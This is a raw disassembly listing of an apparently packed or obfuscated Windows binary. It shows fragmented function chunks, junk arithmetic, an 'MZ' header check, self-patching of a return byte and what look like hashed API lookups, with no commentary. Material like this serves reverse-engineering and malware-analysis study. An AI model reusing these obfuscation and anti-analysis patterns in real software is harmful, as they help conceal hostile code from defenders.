dword_453878	dd 0			; DATA XREF: sub_440059+7o
					; sub_44DE0A+Co ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_45387C:				; CODE XREF: sub_4522F8+32ACj
		jmp	nullsub_495
; END OF FUNCTION CHUNK	FOR sub_4522F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_453881:				; CODE XREF: sub_4527A1+15j
		jmp	loc_44DE4A
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------

loc_453886:				; CODE XREF: hvvrg7ie:004446C4j
		jmp	loc_44970C
; ---------------------------------------------------------------------------
		db 0FAh
dword_45388C	dd 77E60000h		; DATA XREF: sub_443345+4w
					; sub_454789:loc_45130Cr ...
dword_453890	dd 739C65ADh, 19CCD82Bh, 6C6C91E2h ; DATA XREF:	sub_454703-14D22o
					; sub_44DE0A+BBB5o
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45389D:				; CODE XREF: sub_43E128+182E3j
		jmp	loc_4492E8
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_4538A2:				; CODE XREF: sub_44D4EF+Ej
		jmp	loc_45A7D6
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
		sub	eax, ds:dword_43CDBC
		shr	eax, 11h
		jz	loc_4528DC
		jmp	loc_45A931
; ---------------------------------------------------------------------------

loc_4538BB:				; CODE XREF: hvvrg7ie:004562A4j
		test	edi, esi
		jmp	loc_456BEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4538C2:				; CODE XREF: sub_43F227+C4C2j
		test	esi, 9D16DA8h

loc_4538C8:				; CODE XREF: sub_4403D4+18DAFj
		jmp	loc_450984
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_4538CD:				; CODE XREF: sub_450F97:loc_44CA1Bj
		imul	byte ptr [edx]
; END OF FUNCTION CHUNK	FOR sub_450F97
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4538CF:				; CODE XREF: sub_450AA8+3E14j
		cmp	al, 0A4h
		jz	loc_455948
		jmp	loc_43CD79
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		push	6997EBE1h
		jmp	sub_443DF4
; ---------------------------------------------------------------------------

loc_4538E6:				; DATA XREF: hvvrg7ie:00452B2Eo
		jmp	loc_43A656
; ---------------------------------------------------------------------------
		xchg	edx, [esp]
		mov	ecx, edx
		pop	edx
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_4538F3	proc near		; CODE XREF: hvvrg7ie:0043FA72p
					; sub_45028F:loc_4529D5j

; FUNCTION CHUNK AT 004443A9 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00447B80 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A78E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F858 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451412 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E03 SIZE 00000005 BYTES

		mov	eax, ds:dword_43D6CC
		jmp	loc_451412
sub_4538F3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4538FE:				; CODE XREF: hvvrg7ie:loc_4436B5j
		mov	byte ptr [eax],	6Ch
		push	offset sub_44DF8A
		jmp	locret_450339
; ---------------------------------------------------------------------------

loc_45390B:				; CODE XREF: hvvrg7ie:0043FC64j
		and	ebx, eax
		jmp	loc_450A55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_453912:				; CODE XREF: sub_444BE1+6AF2j
		add	edx, 847C22E1h
		xchg	edx, [esp+4+var_4]
		jmp	loc_44D639
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453CA3

loc_453920:				; CODE XREF: sub_453CA3+12j
		xor	esi, 80D7DF19h
		add	esi, 6EE91A14h
		mov	[esi], eax
		pop	esi
		jmp	loc_44F245
; END OF FUNCTION CHUNK	FOR sub_453CA3

; =============== S U B	R O U T	I N E =======================================



sub_453934	proc near		; CODE XREF: sub_4405D7+2C10j
					; sub_454E9F-11297p

; FUNCTION CHUNK AT 00442FBE SIZE 00000007 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	eax
		jmp	loc_442FBE
sub_453934	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_45393F:				; CODE XREF: sub_43D5FD:loc_4422F2j
		and	edx, 0B798EE87h
		xor	edx, 53B0D49Eh
		call	sub_446A16
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		ror	eax, 14h
		call	sub_4410E1

loc_45395E:				; CODE XREF: hvvrg7ie:00439137j
		shl	eax, 2
		mov	edx, [ebp+var_18]
		mov	edx, [edx+1Ch]

loc_453967:				; CODE XREF: hvvrg7ie:loc_451C88j
		add	edx, [ebp+var_4]
		add	eax, edx
		jmp	loc_44681D
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_453971:				; CODE XREF: sub_44616F+1371Ej
		push	offset sub_4413FF
		jmp	nullsub_371
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_45397B:				; CODE XREF: sub_4408AE+9436j
		jz	loc_444EA3

loc_453981:				; CODE XREF: sub_43AF96+20839j
		jmp	loc_453DEC
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_453986:				; CODE XREF: sub_4447AC-A109j
		jmp	sub_458D36
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
		xchg	ecx, [ebp+0]
		xor	ecx, eax
		add	ebp, ecx
		jmp	loc_45238F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_453997:				; CODE XREF: sub_4546E9+7j
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jnz	loc_4504CB

loc_4539A2:				; CODE XREF: hvvrg7ie:0044D85Ej
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_441C18
		jmp	loc_44A98A
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_4539B6:				; CODE XREF: sub_43ECAA+1961Cj
		jp	loc_44E028
		push	esi
		and	ebx, ebp
		sbb	esi, 1D46FB22h

loc_4539C5:				; CODE XREF: sub_43ECAA:loc_44CF3Cj
		push	offset loc_441438
		jmp	loc_453F5A
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4539CF:				; CODE XREF: sub_43F227+1B300j
		jb	loc_44B071
		jmp	loc_4529AB
; ---------------------------------------------------------------------------

loc_4539DA:				; CODE XREF: sub_43F227+111CEj
		sub	al, 99h
		push	offset loc_451D07
		jmp	nullsub_175
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_4539E6:				; CODE XREF: hvvrg7ie:loc_4495DCj
		xchg	ecx, [esp]
		push	edx
		push	0FB666905h
		pop	edx
		and	edx, 4EE39753h
		sub	edx, 7AF7F9FEh
		rol	edx, 1
		or	edx, 0ED79ACFBh
		jmp	loc_44BADB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jb	loc_440BAE
		mov	eax, [esp]
		push	edx
		call	sub_4500E7
		push	6B5216ACh
		jmp	loc_43C3EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E484

loc_453A23:				; CODE XREF: sub_43E484+Fj
		jnz	loc_45AAFD
		jmp	loc_43FB15
; END OF FUNCTION CHUNK	FOR sub_43E484
; ---------------------------------------------------------------------------

loc_453A2E:				; CODE XREF: hvvrg7ie:0045A661j
		pushf

loc_453A2F:				; CODE XREF: hvvrg7ie:loc_4393CEj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_447D08
		jmp	loc_441C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_453A40:				; CODE XREF: sub_45B048:loc_43B46Bj
		xchg	eax, edx
		jmp	loc_4481EE
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_453A47:				; CODE XREF: sub_43F8AB+D281j
		jz	loc_44FDB1
		jmp	loc_44BD61
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------

loc_453A52:				; DATA XREF: sub_43CFCA+6o
		push	edx
		push	707F63F3h
		pop	edx
		xor	edx, 0B51C97DFh
		sub	edx, 61AA0C68h
		jmp	loc_448ED7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481B6

loc_453A6A:				; CODE XREF: sub_4481B6-8EBEj
		or	ebx, eax
		adc	ebx, edx
		shr	ebx, 1
		mov	edx, 0A32F6022h
		sub	eax, ebp
		jmp	loc_446988
; END OF FUNCTION CHUNK	FOR sub_4481B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_453A7C:				; CODE XREF: sub_440643-30EDj
		xor	edx, esi
		xchg	eax, [ebx]
		jb	loc_4444DB

loc_453A86:				; CODE XREF: sub_440643:loc_43D54Ej
		xor	esi, 71D058D8h
		push	offset sub_45061E
		jmp	loc_4462B9
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456784

loc_453A96:				; CODE XREF: sub_456784+13j
		xchg	ebx, [esp+0]
		jmp	loc_4411DE
; END OF FUNCTION CHUNK	FOR sub_456784
; ---------------------------------------------------------------------------

loc_453A9E:				; CODE XREF: hvvrg7ie:loc_4509DBj
		test	al, al
		jz	loc_448F5E
		jmp	loc_45AF2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_453AAB:				; CODE XREF: sub_44BFF5-C3A7j
		adc	esi, 208DBD56h
		adc	eax, 0A22E7CAh
		xor	esi, ebx
		jmp	loc_453304
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_453ABE:				; CODE XREF: sub_44616F+3A37j
		test	ebp, 0D0422F59h
		jmp	loc_44D16B
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_457C91
; ---------------------------------------------------------------------------

loc_453ACF:				; CODE XREF: hvvrg7ie:00446B37j
		mov	ebp, eax
		xchg	ebp, [esp]
		call	sub_449785

loc_453AD9:				; CODE XREF: hvvrg7ie:loc_43D17Ej
		jnz	loc_43AA4D
		jmp	loc_453CC1
; ---------------------------------------------------------------------------

loc_453AE4:				; DATA XREF: sub_44CDBE+8o
		push	4E3DEF99h
		pop	ecx
		xor	ecx, 0EEA7A26Eh
		sub	ecx, 0D5A9B204h
		rol	ecx, 11h
		jmp	loc_4494A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_453AFE:				; CODE XREF: sub_442FD1-1B03j
		add	eax, ebx
		pop	ebx
		mov	eax, [eax]
		push	ebx
		jmp	loc_451F10
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_453B09:				; CODE XREF: sub_43D285+16EB9j
		jnz	loc_450B85
		jmp	loc_454ABB
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_453B14:				; CODE XREF: sub_445CCD+DD5j
		add	eax, 4EA130Ch
		xor	eax, 0C3DD4288h

loc_453B20:				; CODE XREF: hvvrg7ie:0044BC00j
		and	eax, 1D268619h
		add	eax, 12792F34h
		push	offset sub_443E84
		jmp	nullsub_177
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_453B36:				; CODE XREF: sub_440643-48F0j
		jge	loc_451E84

loc_453B3C:				; CODE XREF: sub_43D285+F0F7j
		jmp	loc_440784
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
		cdq
		xchg	eax, [ecx]
		jmp	loc_451E78
; ---------------------------------------------------------------------------

loc_453B49:				; CODE XREF: hvvrg7ie:00445758j
		add	edi, 0D9BA8F1Ch
		cmp	edi, 0A4563974h
		jmp	loc_4527FB
; ---------------------------------------------------------------------------

loc_453B5A:				; CODE XREF: hvvrg7ie:00458DD7j
		ja	loc_451F54
		xor	ebp, esi
		mov	[edi], ecx
		jmp	loc_44010A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_453B69:				; CODE XREF: sub_44D2F8:loc_4450ADj
		jz	loc_439FD7
		jmp	loc_45129B
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_453B74	proc near		; DATA XREF: sub_444C6D+9o

; FUNCTION CHUNK AT 0043E4A6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449C92 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00452BF0 SIZE 00000005 BYTES

		push	0F69B33AAh
		pop	eax
		and	eax, 0DAA3BD21h
		jnz	loc_43E4A6
sub_453B74	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44432F

loc_453B86:				; CODE XREF: sub_44432F:loc_4495E1j
		sub	ecx, 70D6490Dh
		rol	ecx, 1Bh
		and	ecx, 92BF4C18h
		or	ecx, 0A0FFEFABh
		jmp	loc_4486B1
; END OF FUNCTION CHUNK	FOR sub_44432F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_453BA0:				; CODE XREF: sub_449232-A7E8j
		and	edi, ebx
		mov	esi, [ebx]
; END OF FUNCTION CHUNK	FOR sub_449232

; =============== S U B	R O U T	I N E =======================================



sub_453BA4	proc near		; CODE XREF: sub_449232:loc_442808j

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C6C6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445C54 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004466DD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447A7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449B86 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A79A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A803 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C3AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E4C9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E8C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FB7E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450C0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451095 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451AF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452AFB SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004563AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C5F SIZE 0000000B BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		lea	eax, dword_440594
		jmp	loc_44E8C1
sub_453BA4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_453BB5:				; CODE XREF: sub_43D285:loc_444E44j
		popf
		and	edx, edi
		jmp	loc_45B54F
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================



sub_453BBD	proc near		; DATA XREF: sub_44191F:loc_447CCFo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004395CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CAE2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446E50 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448A3F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00449E79 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450B16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451968 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454512 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455249 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B365 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B38B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B53A SIZE 0000000B BYTES

		mov	eax, [eax]
		push	ebx
		pushf
		push	4E81E883h
		pop	ebx
		add	ebx, 0B284FBAAh
		jmp	loc_451968
sub_453BBD	endp

; ---------------------------------------------------------------------------

loc_453BD2:				; CODE XREF: hvvrg7ie:0043ABFEj
		call	sub_45AB9D
		mov	eax, 5389CFC1h
		call	sub_450C5A
		push	ebx
		call	sub_44E5F5
; START	OF FUNCTION CHUNK FOR sub_448181

loc_453BE7:				; CODE XREF: sub_448181+9FF3j
		jmp	sub_43C811
; END OF FUNCTION CHUNK	FOR sub_448181
; ---------------------------------------------------------------------------

loc_453BEC:				; CODE XREF: hvvrg7ie:0043ABC5j
		add	ebx, esi
		jmp	loc_45546E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_453BF4:				; CODE XREF: sub_43D5FD+2D89j
		jmp	loc_45B256
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A87E

loc_453BF9:				; CODE XREF: sub_43A87E+6j
		jmp	sub_4589A2
; END OF FUNCTION CHUNK	FOR sub_43A87E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_453BFE:				; CODE XREF: sub_453EFC-38FAj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_483
; END OF FUNCTION CHUNK	FOR sub_453EFC
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	offset sub_43F447
		jmp	loc_446BDC
; ---------------------------------------------------------------------------

loc_453C14:				; CODE XREF: hvvrg7ie:0044D55Dj
					; hvvrg7ie:loc_454C08j
		pop	ecx
		or	ecx, 7045F345h
		add	ecx, 895F444Ah
		xchg	ecx, [esp]
		jmp	loc_440461
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ah
		mov	ds:dword_439CBC, eax
		jmp	loc_450652
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_453C38:				; CODE XREF: sub_43C0DE+DB0j
		or	eax, 2F708318h
		js	loc_444C83

loc_453C44:				; CODE XREF: sub_43D964-160j
		jmp	loc_44CDD0
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		mov	[eax], ebx
		jmp	loc_444C80
; ---------------------------------------------------------------------------
		push	0E9169E29h
		mov	esi, ecx
		jmp	sub_44905F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_453C5C:				; CODE XREF: sub_450434-35AFj
		adc	edi, ebx

loc_453C5E:				; CODE XREF: sub_455B13:loc_4523BAj
		call	sub_44E6B4
; END OF FUNCTION CHUNK	FOR sub_450434
; START	OF FUNCTION CHUNK FOR sub_4439E7

loc_453C63:				; CODE XREF: sub_4439E7+14j
		jmp	loc_4533A5
; END OF FUNCTION CHUNK	FOR sub_4439E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_453C68:				; CODE XREF: sub_446E8C+11C31j
		jz	sub_4508B6

loc_453C6E:				; CODE XREF: sub_446E8C:loc_448EA3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_444BA8
		jmp	loc_43DE26
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_453C7F:				; CODE XREF: sub_44D2F8:loc_44B657j
		jnz	loc_45486B
		jmp	loc_44DC2B
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_453C8A:				; CODE XREF: sub_444B29:loc_43A30Aj
		mov	eax, [ebp-30h]

loc_453C8D:				; CODE XREF: hvvrg7ie:0043B926j
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		cmp	word ptr [eax],	5A4Dh

loc_453C98:				; CODE XREF: sub_447E20+1202Bj
		jnz	loc_447CE9
		jmp	loc_448CC0
; END OF FUNCTION CHUNK	FOR sub_444B29

; =============== S U B	R O U T	I N E =======================================



sub_453CA3	proc near		; DATA XREF: sub_445B46+5903o

; FUNCTION CHUNK AT 0043D728 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F245 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453920 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045B314 SIZE 00000005 BYTES

		add	eax, 91028C14h
		call	sub_450C5A
		push	esi
		push	118F6801h
		pop	esi
		jmp	loc_453920
sub_453CA3	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_373. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		pop	esi
		jmp	loc_4458C9
; ---------------------------------------------------------------------------

loc_453CC1:				; CODE XREF: hvvrg7ie:00453ADFj
		jz	loc_43B7E3
		jmp	loc_44B159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_453CCC:				; CODE XREF: sub_44989C:loc_450E90j
		add	edx, eax
		pop	eax
		mov	edx, [edx]
		push	ebx
		jmp	loc_455DBA
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------
		adc	eax, esi
		jmp	loc_446950

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_453CDE	proc near		; CODE XREF: sub_448B99-DD87p
					; sub_456DE7-2EFBp
		push	ebp
		mov	ebp, esp
		call	sub_454463

loc_453CE6:				; CODE XREF: sub_447FEB-B290j
		jmp	locret_441E4C
sub_453CDE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4491A7

loc_453CEC:				; CODE XREF: sub_4491A7+Ej
		push	40BE0AFBh
		pop	eax
		rol	eax, 1Eh
		and	eax, ds:4000F6h
		sub	eax, 995B29B1h
		rol	eax, 16h
		xor	eax, 18F9B346h
		jmp	loc_458AD3
; END OF FUNCTION CHUNK	FOR sub_4491A7

; =============== S U B	R O U T	I N E =======================================



sub_453D0F	proc near		; CODE XREF: hvvrg7ie:0044D967p
					; hvvrg7ie:00457CE5j

; FUNCTION CHUNK AT 00439578 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E00E SIZE 0000000F BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	3A9C1FE4h
		pop	ecx
		add	ecx, 2276133h
		and	ecx, 0D7854CDh
		cmp	ecx, 11924737h
		jmp	loc_44E00E
sub_453D0F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_453D30	proc near		; DATA XREF: hvvrg7ie:0044E766o

; FUNCTION CHUNK AT 0044888D SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		jmp	loc_44888D
sub_453D30	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_453D38:				; CODE XREF: sub_450F97:loc_44AB73j
		not	ecx
		js	loc_44695C
		jmp	loc_45A148
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		or	ebx, esi
		js	loc_452108
		jmp	sub_43DBDD
; ---------------------------------------------------------------------------

loc_453D52:				; CODE XREF: hvvrg7ie:0044B848j
					; hvvrg7ie:loc_450DBDj
		or	eax, 8EEA945Dh
		js	loc_451D36
; START	OF FUNCTION CHUNK FOR sub_454099

loc_453D5E:				; CODE XREF: sub_454099-16CADj
		jmp	loc_44C18C
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		cmp	ebp, eax

loc_453D65:				; CODE XREF: hvvrg7ie:loc_441A82j
		jmp	loc_43B21F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A889

loc_453D6A:				; CODE XREF: sub_45A889-184C9j
					; hvvrg7ie:00459510j
		add	ecx, 89020711h
		add	eax, ecx
		pop	ecx
		mov	eax, [eax]
		jmp	loc_4540C2
; END OF FUNCTION CHUNK	FOR sub_45A889
; ---------------------------------------------------------------------------

loc_453D7A:				; CODE XREF: hvvrg7ie:004527E4j
		push	699E14FCh
		jmp	loc_444C44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_453D84:				; CODE XREF: sub_458374:loc_458DBDj
		jz	loc_43CAC1

loc_453D8A:				; CODE XREF: sub_442334:loc_444C35j
		jmp	loc_44331C
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------
		mov	eax, 205AA81Dh
		call	sub_450C5A
		mov	ds:off_41D1B0, eax
		lea	eax, sub_4408AE
		jmp	loc_440BFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_453DAA:				; CODE XREF: sub_440AD9-58DDj
		test	ebx, 0A101B2DCh
		jmp	loc_43FD41
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_453DB5:				; CODE XREF: sub_43D285:loc_44408Ej
		jz	loc_44EDA7
		jmp	loc_44000A
; END OF FUNCTION CHUNK	FOR sub_43D285

; =============== S U B	R O U T	I N E =======================================



sub_453DC0	proc near		; DATA XREF: sub_4426F3+8o
		xchg	esi, [esp+0]
		push	0B8FFE7BAh
		pop	edx
		and	edx, 83738559h
		or	edx, 76C44B10h
		add	edx, 94A0170h
		push	offset loc_446894
		jmp	loc_450B0C
sub_453DC0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_453DE5:				; CODE XREF: sub_453405-5B49j
		xchg	ecx, ebx
		jmp	loc_443C98
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_453DEC:				; CODE XREF: sub_4408AE:loc_453981j
		add	ecx, ebx
		jmp	loc_43C0BF
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------

loc_453DF3:				; CODE XREF: hvvrg7ie:loc_442DDFj
		mov	eax, ds:dword_458D78
		call	sub_4426E2
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_453DFE:				; CODE XREF: sub_43D247+8791j
		ror	eax, 19h
		mov	ds:dword_43D6E4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43D247

; =============== S U B	R O U T	I N E =======================================



sub_453E08	proc near		; CODE XREF: hvvrg7ie:loc_43DC8Ep
					; sub_43EF3E:loc_43ED45p ...

; FUNCTION CHUNK AT 00440DFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004429C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B7F SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044B40C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DE7D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004500F0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045608C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B1D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B24E SIZE 00000008 BYTES

		jno	sub_4500FA
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		jmp	loc_4429C9
sub_453E08	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_453E19:				; CODE XREF: sub_448BC0+3BF9j
		jg	loc_44CCAE
		push	edi
		popf
		sub	edi, 0A2501E12h
		jmp	loc_445F8D
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

loc_453E2C:				; DATA XREF: sub_43B8A5:loc_454AE6o
		pop	ecx
		mov	[ebp-20h], eax
; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_453E30:				; CODE XREF: sub_43B8A5:loc_43B821j
					; sub_445FD4:loc_43DF3Dj ...
		jnz	loc_43EBD8
		test	byte ptr [ebp-8], 40h
		jmp	loc_4494AF
; END OF FUNCTION CHUNK	FOR sub_43E26C
; ---------------------------------------------------------------------------
		mov	ecx, 2A7522CEh
